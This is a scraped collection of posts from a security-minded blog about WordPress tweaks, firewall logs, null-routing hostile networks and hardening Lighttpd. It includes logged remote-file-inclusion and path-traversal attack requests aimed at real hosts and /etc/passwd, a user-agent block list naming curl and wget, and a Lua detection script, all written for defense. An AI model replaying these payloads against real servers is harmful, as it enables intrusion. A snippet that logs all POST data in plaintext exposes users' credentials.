I can't find any information on this, but out of curiosity, is it possible to get *just* security fixes for old WP version? So, say when 3.0 comes out and it jumps up from 2.9.4, would there be a "2.9.5" for the security fixes? My guess is no, but I thought I'd check.

That is a fantastic idea. On my production Debian servers, *only* the security repos are enabled so *only* the security updates are applied. Why couldn't this also work for WordPress? For me, updating WordPress is a royal pain in the ass due to the core fixes hacks/edits. As a result, WordPress gets updated once every four or five major releases, with the exception of manually applied security patches (of course). But a security-updates only feature for WordPress? Count me in. Hell, I'll even help with patching the older branches if necessary.

To some, security patches are more of a concern than a "Trash Can" (wait, wat?) feature for posts/comments. I'll save that rant for another post. Fckin WordPress trash can, geez...

Potential Search Terms

Remove the WordPress Update Nag Without a Plugin
Remove the WordPress Update Message Without a Plugin
Get rid of the WordPress Update Message Without a Plugin
Get rid of the WordPress Update Nag Without a Plugin
WordPress Update Nag Admin Hack

See Also:

• 11/28/2009 -- New Wordpress Plugin: IP Intelligence
  Excerpt: "Description IP Intelligence the ability to retrieve information about a commentators IP address without leaving the "edit-comments.php" page. Version 0.0.1 is capable of retrieving the following information: Reverse DNS/PTR Long/Proper IPv4 ..."
  
• 01/30/2008 -- Secure Your Wordpress Admin Folder With lighttpd
  Excerpt: "As you might have guessed, I'm ultra concerned about security. Security isn't my area of expertise, nor do I claim to have any superior knowledge in the field, but sometimes being ahead of the game can prove beneficial. Shoemoney's blog has been defaced twice ..."
  
• 01/30/2008 -- 2 More Wordpress Plugin Exploits – Adserve & WassUp
  Excerpt: "Wow, four Wordpress plugin exploits released in under a week. Are these plugin authors really amateurs, or just trying to pwn Wordpress blogs? First up, Adserve version 0.2. The SQL injection vulnerability resides in adclick.php. Here's the vulnerable ..."
  
• 01/28/2008 -- 2 New Wordpress Plugin SQL Injection Vulnerabilities
  Excerpt: "That's right Wordpresss kiddies, two new vulnerabilities, and they're pretty nasty. Author Houssamix From H-T Team has released two remote SQL injection proof of concepts for WP-Cal and fGallery 2.4.1. The vulnerability for WP-Cal exists ..."
  

From: Rob Fuller
To: pen-test@securityfocus.com
Date: Sun, 27 Dec 2009 20:29:11 -0500
Subject: ShmooCon Slugs - Ride Sharing

ShmooCon Slugs was created to help facilitate people getting together
for rides to ShmooCon 2010. http://shmooslugs.pbworks.com/

We already have two on the board, one from Atlanta and one from Toronto.

Please tweet, email, blog this, since it only works if everyone knows about it.

--
Rob Fuller | Mubix
Room362.com | Hak5.org | TheAcademyPro.com

More Info:
- http://shmooslugs.pbworks.com/Looking-for-Riders
- http://shmooslugs.pbworks.com/Looking-for-Drivers

More From Nullamatix.com:

• 12/31/2007 -- Updates and a Happy New Year
  Excerpt: ""
  
• 05/03/2009 -- Rackmount Hammock – Server Room Accessory
  Excerpt: ""
  
• 01/22/2008 -- 301 Redirect Codes For PHP, ASP, Coldfusion, and More
  Excerpt: ""
  
• 04/24/2009 -- New Page: Interesting Server Logs
  Excerpt: ""
  

Dec 27 05:00:38: SRC=140.32.107.150 PROTO=TCP SPT=53175 DPT=80
Dec 27 05:01:53: SRC=140.32.107.150 PROTO=TCP SPT=53175 DPT=80
Dec 27 05:03:08: SRC=140.32.107.150 PROTO=TCP SPT=53175 DPT=80
Dec 27 05:04:23: SRC=140.32.107.150 PROTO=TCP SPT=53175 DPT=80
Dec 27 05:05:38: SRC=140.32.107.150 PROTO=TCP SPT=53175 DPT=80
Dec 27 05:06:53: SRC=140.32.107.150 PROTO=TCP SPT=53175 DPT=80
Dec 27 05:09:23: SRC=140.32.107.150 PROTO=TCP SPT=53175 DPT=80
Dec 18 09:25:19: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80
Dec 18 09:26:34: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80
Dec 18 09:27:49: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80
Dec 18 09:29:04: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80
Dec 18 09:30:19: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80
Dec 18 09:31:34: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80
Dec 18 09:32:49: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80
Dec 18 09:34:04: SRC=140.32.107.150 PROTO=TCP SPT=11601 DPT=80

What's really interesting are the lack of Lighttpd logs. Based on the logs I have, that IP has never made a legitimate visit to any of the sites hosted on this server. So what's the DoD up to? I don't mind them visiting at all, but why the invalid connection attempts? If someone at the DoD wants some information about this server, all they have to do is ask.

Whois Information for 140.32.107.150

OrgName:    DoD Network Information Center
OrgID:      DNIC
Address:    3990 E. Broad Street
City:       Columbus
StateProv:  OH
PostalCode: 43218
Country:    US

NetRange:   140.32.0.0 - 140.32.255.255
CIDR:       140.32.0.0/16
NetName:    SUM-DET-5
NetHandle:  NET-140-32-0-0-1
Parent:     NET-140-0-0-0-0
NetType:    Direct Assignment
NameServer: NS1.ARL.ARMY.MIL
NameServer: NS1.NOSC.MIL
NameServer: NS1.HPCMO.HPC.MIL
Comment:
RegDate:    1990-04-08
Updated:    2007-08-23

OrgTechHandle: MIL-HSTMST-ARIN
OrgTechName:   Network DoD
OrgTechPhone:  +1-800-365-3642
OrgTechEmail:  HOSTMASTER@nic.mil

OrgTechHandle: REGIS10-ARIN
OrgTechName:   Registration
OrgTechPhone:  +1-800-365-3642
OrgTechEmail:  REGISTRA@nic.mil

See Also:

• 05/13/2009 -- IPTables Drop Log For 05.12.09
  Excerpt: "The Internet; so magical and dangerous, getting connected is a risk we're all willing to take. Whether you're infiltrating some moron's botnet, or just surfing the web, the possibility of becoming a victim in a cyber attack is real. Everyday, without fail, ..."
  
• 01/17/2010 -- New Tool: IP Range to CIDR
  Excerpt: "At least twice a week I find myself visiting ip2cidr.com, the IP to CIDR converter. Since the owner/author of the site hasn't release the source code, and I love a challenge, I developed my own version. The guys at the job find the tool useful, and after a ..."
  
• 03/05/2008 -- What’s Your Computer Connecting To?
  Excerpt: "A security conscious buddy of mine is an advocate of the Sysinternals freeware utilities. For those of you who don't know, Mark Russinovich, one of the Sysinternals co founders, was the guy that discovered and exposed the Sony BMG root kit back in 2005. In ..."
  
• 02/15/2008 -- Picture: The Importance of a Good Firewall
  Excerpt: "This is what happened when I took down my network's defenses the other day. Fortunately my Windows machines were patched, or I might have been hit with a nasty remote exploit, or eighty. Click the thumbnail for the larger version. Those are all incoming ..."
  

Most spammers aren't clever enough to populate the REFERER header. This code snippet is not only extremely easy to implement, but pretty effective, too. Open up your themes functions.php and drop in the following:

function wp_check_referrer() {
	if (empty($_SERVER['HTTP_REFERER']) || (!isset($_SERVER['HTTP_REFERER'])) {
		wp_die( __('Undefined HTTP_REFERER.') ); }
}
add_action('check_comment_flood', 'wp_check_referrer');

Now, unless the REFERER field is set, they won't even make it to Akismet! Probably wouldn't hurt to warn your visitors since a select few might intentionally prevent sending a REFERER string. This isn't unusual for anyone coming from a proxy or one of the many FireFox extensions that protect "privacy."

Post Word Count

As the heading says, this will count the number of words in a post. Open up functions.php again and insert the following:

function getwc() {
	ob_start();
	the_content();
	$content = ob_get_clean();
	return sizeof(explode(" ", $content));
}

To display the word count for all to see, insert the following inside the WordPress loop (if have_posts() ... ). single.php probably works best..

	<p>Word Count: <?php echo getwc(); ?></p>

Log all POSTs to a Text File

This WordPress hack is a bit longer, but can provide some interesting information. By adding this block of code to your functions.php, all $_POST submissions will end up in a text file of your choice. Setup is simple: replace 172.16.20.9 and 192.168.80.20 with IPs to exclude (usually your own), and set the path to a log file. Outside of the public_html directory is probably a good idea.

function server_post_logd() {
	$client_addr  = $_SERVER['REMOTE_ADDR'];
	$request_file = $_SERVER['SCRIPT_NAME'];
	if ($client_addr != '172.16.20.9' && $client_addr != '192.168.80.20') {
		if(!empty($_POST)) {
			$fp = fopen('/users/nullamatix.com/logs/post_logd-file.txt', 'a');
			foreach($_POST as $key => $value) {
				fwrite($fp, $key.' = '.$value."\n");
			}
			fwrite ($fp, $client_addr . "\n");
			fwrite ($fp, $request_file . "\n");
			fwrite ($fp, date("F j, Y, g:i a") . "\n");
			fwrite ($fp, '--------------**********------------------'."\n\n" );
			fclose ($fp);
		}
	}
}
add_action('init', 'server_post_logd');

Just make sure /users/nullamatix.com/logs/post_logd-file.txt exists and is writable by the server. Be aware, if you have enemies, this can fill up disk space and potentially cause a DoS attack.

All Posts, 1 Page

Create a WordPress page template file called "All Posts" or whatever. Here's the code - pretty simple stuff.

<?php 

	$total_posts = $wpdb->get_var("SELECT COUNT(*) FROM
	$wpdb->posts WHERE post_status = 'publish'"); 

	if (0 < $total_posts) $total_posts = number_format($total_posts); ?>

<h2><?php echo $total_posts; ?> Posts Since July 10th, 1966</h2>
<ul>

<?php

	$all_posts = get_posts('post_type=any&exclude=80,55&numberposts=-1&');
	foreach($all_posts as $post) : ?>

		<li><?php the_time('m/d/y') ?>: <a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></li>

<?php endforeach; ?>

</ul>

Live Demo: All Nullamatix.com Posts

Alright, that's all I'm able to come up with at the moment. What are some of your favorite WordPress Hacks?

See Also:

• 12/25/2009 -- New Tool: Daily [Mod] Security Reports
  Excerpt: "After the Lighttpd mod security post and the DDoS attack that followed, I began working on a script that parses the Lighttpd server-error.log and inserts matched records into MySQL. The result? Check it out here: security.nullamatix.com Daily Security ..."
  
• 11/28/2009 -- New Wordpress Plugin: IP Intelligence
  Excerpt: "Description IP Intelligence the ability to retrieve information about a commentators IP address without leaving the "edit-comments.php" page. Version 0.0.1 is capable of retrieving the following information: Reverse DNS/PTR Long/Proper IPv4 ..."
  
• 03/08/2008 -- Automated Adsense Privacy Policy Deployment Guide
  Excerpt: "Hopefully you took the time to actually read the new Adsense Terms and Conditions. The new terms require all Adsense publishers to display a privacy policy on any web-site displaying Adsense ads. Here's an excerpt from this page: We've also added some ..."
  
• 03/04/2008 -- Defeat Spam Blogs With IP Based Content Delivery
  Excerpt: "The majority of bloggers are forced to deal with spam blogs (splogs, aka scraper blogs), and even though a variety of counter measures exist, they just don't seem to do the trick. Most of the time, splogs will scrape only an excerpt from the post, making the ..."
  

1. SSL Certificate for https support
2. An API to enable client submissions
3. Details information about individual IPs (blacklists, rDNS, ASN, db frequency, etc)
4. Auto generated links to ProjectHoneyPot, Robtex, Stop Forum Spam, and more
5. Get the search working correctly
6. Discussion/comment form on each IP to enable visitor interaction
7. Auto generated IP tables/null route rules for IPs/netblocks

So, as I said, the tool is far from complete, and I need your help. What sort of features would you like to see? Could the tool eventually have a value to the Internet community, or just me? Don't be shy - leave your comments, suggestions, criticisms, or questions below.

Also, WordPress users that like to know about the source of their commentators should check out my first official WordPress plug-in: IP Intelligence.

Merry Chrimmus and eehh... bah-hum-bug.

See Also:

• 12/10/2009 -- 529 Attacks in 9 Days: id1.txt, RFI, & More
  Excerpt: "Long time Nullamatix readers know how much I love reviewing log files. Logs can provide detailed incite into not only the overall health of a system, but information one can use to mitigate the risks of automated attacks. In this post, I'll go over a couple ..."
  
• 04/24/2009 -- New Page: Interesting Server Logs
  Excerpt: "This is a short post. A status update more than anything. Before posting Madlib Site PHP code examples demonstrating how to use the content you've obtained from: Free Data Sources for Blue Hat SEO's Madlib Technique, I thought of a potentially interesting ..."
  
• 04/11/2010 -- Howto: XCache in a Lighttpd Chroot on Debian
  Excerpt: "Whether you're pressed for resources on a virtual/dedicated server, or simply looking for ways to improve web application performance, XCache is guaranteed to produce the desired result. Within minutes of installing XCache: page load times were cut in half, ..."
  
• 12/26/2009 -- WordPress Hacks Worth Implementing
  Excerpt: "Combat Comment Spam Most spammers aren't clever enough to populate the REFERER header. This code snippet is not only extremely easy to implement, but pretty effective, too. Open up your themes functions.php and drop in the following: function ..."
  

The Involved

These IP addresses contributed to the 133MB worth of dropped firewall log data generated between 03:05:07 and 03:40:00. I imagine by 03:40, the entire pipe was filled and iptables wasn't seeing anything else to drop, hence the decline in the number of packets.

CIDR for The Involved

For anyone interested, here are the CIDR blocks for the involved networks:

[nullamatix.com ~]:# ip route show | sed 's/unreachable //;s/ scope.*$//' | grep -v ' dev'
140.128.0.0/13
84.19.160.0/19
213.74.0.0/16
85.12.0.0/18
72.18.192.0/20
81.27.32.0/20
92.48.64.0/18
85.10.128.0/20
87.118.64.0/18
79.140.64.0/20
62.193.192.0/18
213.186.32.0/19
212.58.0.0/19
192.83.166.0/23
79.132.192.0/19
204.16.240.0/21

Null Route The Involved

Here's how to null route these networks:

route add -net 140.128.0.0/13 reject
route add -net 84.19.160.0/19 reject
route add -net 213.74.0.0/16 reject
route add -net 85.12.0.0/18 reject
route add -net 72.18.192.0/20 reject
route add -net 81.27.32.0/20 reject
route add -net 92.48.64.0/18 reject
route add -net 85.10.128.0/20 reject
route add -net 87.118.64.0/18 reject
route add -net 79.140.64.0/20 reject
route add -net 62.193.192.0/18 reject
route add -net 213.186.32.0/19 reject
route add -net 212.58.0.0/19 reject
route add -net 192.83.166.0/23 reject
route add -net 79.132.192.0/19 reject
route add -net 204.16.240.0/21 reject

IPTable DROP The Involved

And here's how to drop incoming data from these networks with IP tables:

iptables -A INPUT -s 140.128.0.0/13 -j DROP
iptables -A INPUT -s 84.19.160.0/19 -j DROP
iptables -A INPUT -s 213.74.0.0/16 -j DROP
iptables -A INPUT -s 85.12.0.0/18 -j DROP
iptables -A INPUT -s 72.18.192.0/20 -j DROP
iptables -A INPUT -s 81.27.32.0/20 -j DROP
iptables -A INPUT -s 92.48.64.0/18 -j DROP
iptables -A INPUT -s 85.10.128.0/20 -j DROP
iptables -A INPUT -s 87.118.64.0/18 -j DROP
iptables -A INPUT -s 79.140.64.0/20 -j DROP
iptables -A INPUT -s 62.193.192.0/18 -j DROP
iptables -A INPUT -s 213.186.32.0/19 -j DROP
iptables -A INPUT -s 212.58.0.0/19 -j DROP
iptables -A INPUT -s 192.83.166.0/23 -j DROP
iptables -A INPUT -s 79.132.192.0/19 -j DROP
iptables -A INPUT -s 204.16.240.0/21 -j DROP

Feel free to ask any questions, I'll do my best to provide any information I can. Still have absolutely no idea what might have provoked such an attack.

See Also:

• 04/24/2009 -- Flow Control Platform (FCP) is Pissing Me Off
  Excerpt: "Every two hours or so my servers are set to email me a summary of events and other misc. information. Some of the information is memory/cpu utilization, which processes are running, a list of listening services, which cron-jobs ran, who logged in, etc. My ..."
  
• 07/25/2007 -- Old School DDoS Attacks – How Large Servers Got Pwned
  Excerpt: "/* How Large Servers are Owned via DDoS written by perator */ Every time you dial up to your ISP, your box is assigned an IP address. An IP address is a number (eg. 199.44.2.1) that identifies you on the internet. Every online computer has its ..."
  
• 01/17/2010 -- New Tool: IP Range to CIDR
  Excerpt: "At least twice a week I find myself visiting ip2cidr.com, the IP to CIDR converter. Since the owner/author of the site hasn't release the source code, and I love a challenge, I developed my own version. The guys at the job find the tool useful, and after a ..."
  
• 12/28/2009 -- Invalid Packets From the DoD
  Excerpt: "The firewall policies on Nullamatix.com DROP invalid connection attempts. Specifically, if an attempt to start a new tcp connection is not a syn packet, the packet is rejected. This morning I noticed a few dropped connection attempts from an unusual source, ..."
  

php.ini

Before we get into blocking specific attacks, let's take a look at [and fix] the php.ini file. Two very dangerous and usually unnecessary options are: allow_url_fopen and allow_url_include.

allow_url_fopen from php.net:

This option enables the URL-aware fopen wrappers that enable accessing URL object like files. Default wrappers are provided for the access of remote files using the ftp or http protocol, some extensions like zlib may register additional wrappers.

allow_url_include

This option allows the use of URL-aware fopen wrappers with the following functions: include(), include_once(), require(), require_once().

Here are a couple 1 liners that will update the php.ini files and set those options to: Off

sed -i 's/allow_url_fopen = On/allow_url_fopen = Off;s/allow_url_include = On/allow_url_include = Off/' /etc/php5/cgi/php.ini
sed -i 's/allow_url_fopen = On/allow_url_fopen = Off;s/allow_url_include = On/allow_url_include = Off/' /etc/php5/cli/php.ini

To commit the changes, restart your http daemon.

User-Agent Filtering

An additional step worth implementing to prevent automated attacks from inexperienced script kiddies is user-agent filtering. This won't stop an experienced attacker since the user-agent string is easily forged, but is definitely worth implementing, anyway.

User-agents to consider blocking:

• VB Project
• Twiceler-0.9
• Wordpress/2.7
• libwww-perl
• curl & CURL
• Python-urllib
• wget
• MofeusFuckingScanner
• Java/1.6
• Java/1.6.0_13
• MJ12bot
• WebDataCentreBot
• BDFetch

There are probably many others, but these are the agents I've found that 9 times out of 10 are up to no good. Here's how to implement user-agent blocking in Lighttpd. There are also ways to implement this same functionality with Apache/htaccess.

$HTTP["useragent"] =~ "VB Project|libwww-perl|curl" {
	url.access-deny = ( "" )
}

Note: A great way to maintain access control lists in Lighttpd is to create a new file and just "include" it into your config. This keeps your primary Lighttpd config neat and organized.

Attack Detection

Now for the good stuff, log file analysis. Here are some of the attacks I mentioned in the title, condensed to show only 1 attack per IP rather than the half a dozen or more they really attempted:

209.92.156.53 "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1"
205.234.184.42 "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://stelsis.ru/clx/id3.txt?? HTTP/1.1"
125.245.165.135 "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://couplehome.com/bbs/skin/ggerzer_diary/images/id1.txt??? HTTP/1.1"
64.22.119.110 "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://kelapa.fileave.com/a.txt??? HTTP/1.1"
209.97.212.185 "GET ///calendar/?cfg[rootPath]=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1"
190.97.219.4 "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1"
170.210.192.78 "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1"
200.31.105.19 "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1"
210.245.87.237 "GET /skins/advanced/advanced1.php?pluginpath[0]=http://rezosenzo.free.fr/phpRaid/id.txt?? HTTP/1.1"
64.22.119.110 "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://kelapa.fileave.com/a.txt??? HTTP/1.1"
200.58.71.90 "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1"
209.97.212.185 "GET //calendar/?cfg[rootPath]=http://d10770259.serv126.ixwebhosting.com//blocks/id1.txt?? HTTP/1.1"
174.143.159.60 "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://200.209.69.194/bot/fx29id.txt?? HTTP/1.1"
79.64.223.41 "GET /?_SERVERDOCUMENT_ROOT=http://www.ewelder.co.kr/bbs//upload/id1.txt?? HTTP/1.1"
74.63.9.116 "GET //app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.computerpointonline.it/pub/eq1.txt?&mode=id HTTP/1.1"
190.97.219.4 "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://ucing.t35.com/id1.txt?? HTTP/1.1"
211.234.106.119 "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://ucing.t35.com/id1.txt??? HTTP/1.1"
190.97.219.4 "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://ucing.t35.com/id1.txt?? HTTP/1.1"
211.234.106.119 "GET /trackback//snippets/reflect/snippet.reflect.php?reflect_base=http://ucing.t35.com/id1.txt??? HTTP/1.1"
74.63.9.116 "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.computerpointonline.it/pub/eq1.txt?&mode=id HTTP/1.1"
117.74.98.18 "GET ///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kontolku.150m.com/fx1.txt??? HTTP/1.1"
69.175.2.194 "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://f1gossip.org/temp/fx29id.txt?? HTTP/1.1"
193.0.88.1 "GET //?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1"
64.33.77.13 "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0"
78.110.50.121 "GET /newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/small/2009_01_06/id1.txt? HTTP/1.1"
217.6.171.44 "GET /errors.php?error=http://www.freewebtown.com/fucku10/fx29id1.txt?? HTTP/1.1"
110.45.145.165 "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://n34.biz/.injek/id23.txt? HTTP/1.1"
217.6.171.44 "GET /errors.php?error=http://www.freewebtown.com/fucku10/fx29id1.txt?? HTTP/1.1"
110.45.145.165 "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://n34.biz/.injek/id23.txt? HTTP/1.1"
92.50.143.90 "GET /db_connect.php?baseDir/errors.php?error=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1"
200.234.200.230 "GET ///vwar/backup/errors.php?error=http://www.computerpointonline.it/pub/eq1.txt?&mode=id HTTP/1.1"
67.223.249.152 "GET /?_SERVERDOCUMENT_ROOT=http://www.ewelder.co.kr/bbs//upload/id1.txt??%20HTTP/1.1 HTTP/1.0"
66.249.65.200 "GET /?_SERVERDOCUMENT_ROOT=http://www.ewelder.co.kr/bbs//upload/id1.txt??%20HTTP/1.1 HTTP/1.1"
124.0.102.66 "GET /?path=http://n34.biz/id1.txt? HTTP/1.1"

To see the full list, check out this txt file.

To find these lamers, I used the following:

[nullamatix]:# cd /var/log/lighttpd
[nullamatix]:# grep -h '\/Dec\/2009:' *.log \
| egrep -v '\/robots\.txt|\/pubkey\.txt' \
| egrep -c '"GET .*=http:\/\/.* H|\.\.\/\.\.\/|\.txt.* H' \
| awk '{print $1" "$6" "$7" "$8}'

Can also try:

[nullamatix]:# grep -hr '\.\.\/\.\.\/' *.log \
| sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}'

This should output something similar to the following:

91.121.10.161 "//errors.php?error=../../../../../../../../../../../../../proc/self/environ%00
209.151.162.176 "//advanced1.php?pluginpath[0]=./../../../../../../../../etc/passwd
209.151.162.176 "/arcade1.php?phpbb_root_path=./../../../../../../../../etc/passwd%00
200.219.195.66 "/errors.php?error=./../../../../../../../../etc/passwd
68.166.79.199 "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
190.97.219.4 "//catalogue.php?cat=../../../../../../../../../../../../../etc/passwd%00
77.92.91.3 "/ashop/catalogue.php?cat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

Lighttpd mod_security

Ok, mod_security isn't entirely true, but an lua script for mod_magnet is. The following will explain how to setup and maintain an intrusion detection/prevention system (IDS/IPS) for all your Lighttpd sites. The first step is to create the lua script, which I'll call mod_security.lua. Please be aware these instructions do not take chroot setups into consideration. If you're clever enough to deploy a chrooted instance of Lighttpd, you're probably clever enough to figure out how to make this work.

[nullamatix]:# touch /etc/lighttpd/mod_security.lua
[nullamatix]:# chown www-data:www-data /etc/lighttpd/mod_security.lua
[nullamatix]:# chmod 0600 /etc/lighttpd/mod_security.lua
[nullamatix]:# vim /etc/lighttpd/mod_security.lua

Once mod_security.lua is open, copy/paste:

LOG = true
DROP = true
function retErr(e)
	if (lighty.env["request.remote-ip"]) then
		remoteip = lighty.env["request.remote-ip"]
	else
		remoteip = "UNKNOWN_IP"
	end
	if (LOG == true) then
		print (remoteip .. " BLOCKED - " .. e .. " - " .. lighty.request["Host"] .. "" .. lighty.env["request.uri"])
	end
	if (DROP == true) then
		return 405
	end
end
function BadURL(c)
	-- convert urls to all lowercase
	d = string.lower(c)
	if (string.find(d, "fx29id1.txt")) then
		return retErr('Threat: fx29id1.txt')
	elseif (string.find(d, "id23.txt")) then
		return retErr('Threat: id23.txt')
	elseif (string.find(d, "id.txt")) then
		return retErr('Threat: id.txt')
	elseif (string.find(d, "id1.txt")) then
		return retErr('Threat: id1.txt')
	elseif (string.find(d, "fxid.txt")) then
		return retErr('Threat: fxid.txt')
	elseif (string.find(c, "serveqdocument_root")) then
		return retErr('Bad URL')
	-- make sure all your patters are lowercase!
	elseif (string.find(c, "server[document_root]")) then
		return retErr('Bad URL')
	end
end
if (BadURL(lighty.env["request.uri"]) == 405) then
	ret = 405
end
return ret

If any lua gurus out there know of a less bloated better way to handle the string checks (if/elseif is not suckless), please post a comment or send me an email with your suggestion(s). An array type implementation might help with maintaining the BadURL strings, but I'm no lua developer. Anyway, back to the post....

If not enabled already, enable mod_magnet.

[nullamatix]:# lighty-enable-mod magnet

Or just add to "server.modules" in lighttpd.conf. Before restarting Lighttpd, mod_magnet has to know about mod_security.lua. To make sure all configured sites are protected by mod_security.lua, do not include this line in a HOST or SOCKET setting. Immediately after the sever.modules definition seems to work. For example (lighttpd.conf):

server.modules = ("mod_auth", "mod_evasive", "mod_magnet")
magnet.attract-physical-path-to = ("/etc/lighttpd/mod_security.lua")

Finally, restart Lighttpd and check the "server.errorlog" file (ie: /var/log/lighttpd/errors.log) to make sure Lighttpd restarted successfully. If mod_magnet failed to load or was unable to find mod_security.lua, your server will not restart. To make sure mod_security.lua is working correctly, tail -f /var/log/lighttpd/errors.log, try appending one of the BadURL strings to your domain, then hit it with Firefox.

For example:
www.Domain-X.com/wp-login.php?p=http://r00ted.biz/id1.txt?

If id1.txt is one of the strings defined in mod_security.lua, 405 - Method Not Allowed should appear in Firefox, and the errors.log should have an entry for the dropped request.

2009-12-10 11:48:14: (mod_magnet) (lua-print) 172.16.20.8 BLOCKED - Threat: id1.txt - www.Domain-X.com/wp-login.php?p=http://r00ted.biz/id1.txt?

If so, congratulations! You've taken a few small steps that should drastically improve the security of your server.

Conclusion

Realistically, this post is only the tip of the iceberg for proactive http server risk reduction. A reactive approach is better than an inactive approach, so take the time to study and review logs. If there's anything you'd like to add or just ask about, submit a comment below or email me.

See Also:

• 04/11/2010 -- Howto: XCache in a Lighttpd Chroot on Debian
  Excerpt: "Whether you're pressed for resources on a virtual/dedicated server, or simply looking for ways to improve web application performance, XCache is guaranteed to produce the desired result. Within minutes of installing XCache: page load times were cut in half, ..."
  
• 12/25/2009 -- New Tool: Daily [Mod] Security Reports
  Excerpt: "After the Lighttpd mod security post and the DDoS attack that followed, I began working on a script that parses the Lighttpd server-error.log and inserts matched records into MySQL. The result? Check it out here: security.nullamatix.com Daily Security ..."
  
• 12/12/2007 -- Nullamatix.com Survived The Digg Effect, Barely
  Excerpt: "Wow, what an interesting day. After experiencing The Digg Effect first hand, and looking over a few stats, I've made the conclusion that Digg users are comparable to a swarm of crack heads surfing the Internet. Don't get me wrong, landing on the front page of ..."
  
• 01/10/2010 -- Solution: chown: invalid user: www-data:www-data
  Excerpt: "Ran into this issue after getting rid of the www-data user and group. The solution is simple and doesn't involve adding the account/group, assuming the objective is to run Lighttpd as a different user (not www-data). If the intention is to run Lighttpd with ..."
  

IP Intelligence the ability to retrieve information about a commentators IP address without leaving the "edit-comments.php" page. Version 0.0.1 is capable of retrieving the following information:

• Reverse DNS/PTR
• Long/Proper IPv4 Format
• Country of Origin
• Region or State
• City
• Timezone
• StopForumSpam.com Data
• Whois Information

IP Intelligence also provides targeted/dynamic links to the following destinations for further research:

• Google Search Query
• Google Groups Search Query
• Project HoneyPot
• Spamhaus
• OpenRBL
• Robtex (Lucky)

Tested and working with Firefox/Iceweasel 3.0.6+. IE6 Has some rendering issues in the popup window (admin menus aren't hidden). Not tested in Safari, Opera, or IE7+.

Wordpress.org

• http://wordpress.org/extend/plugins/ip-intelligence/

Installation

1. Upload the "ipintel" folder to the `/wp-content/plugins/` directory.
2. Activate the plugin through the 'Plugins' menu in Wordpress.
3. Visit the "edit-comments.php" page from the Wordpress admin menu and look for the "IP Intel" links.
4. note: Also works with page=akismet-admin

Screenshots

Download

• WordPress.org Plugins Page
• readme.txt

License

Copyright 2009 Guy Patterson (email : 'ipintel at nullamatix')

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

See Also:

• 12/26/2009 -- WordPress Hacks Worth Implementing
  Excerpt: "Combat Comment Spam Most spammers aren't clever enough to populate the REFERER header. This code snippet is not only extremely easy to implement, but pretty effective, too. Open up your themes functions.php and drop in the following: function ..."
  
• 03/08/2008 -- Automated Adsense Privacy Policy Deployment Guide
  Excerpt: "Hopefully you took the time to actually read the new Adsense Terms and Conditions. The new terms require all Adsense publishers to display a privacy policy on any web-site displaying Adsense ads. Here's an excerpt from this page: We've also added some ..."
  
• 01/30/2008 -- 2 More Wordpress Plugin Exploits – Adserve & WassUp
  Excerpt: "Wow, four Wordpress plugin exploits released in under a week. Are these plugin authors really amateurs, or just trying to pwn Wordpress blogs? First up, Adserve version 0.2. The SQL injection vulnerability resides in adclick.php. Here's the vulnerable ..."
  
• 01/28/2008 -- 2 New Wordpress Plugin SQL Injection Vulnerabilities
  Excerpt: "That's right Wordpresss kiddies, two new vulnerabilities, and they're pretty nasty. Author Houssamix From H-T Team has released two remote SQL injection proof of concepts for WP-Cal and fGallery 2.4.1. The vulnerability for WP-Cal exists ..."
  

Requirements

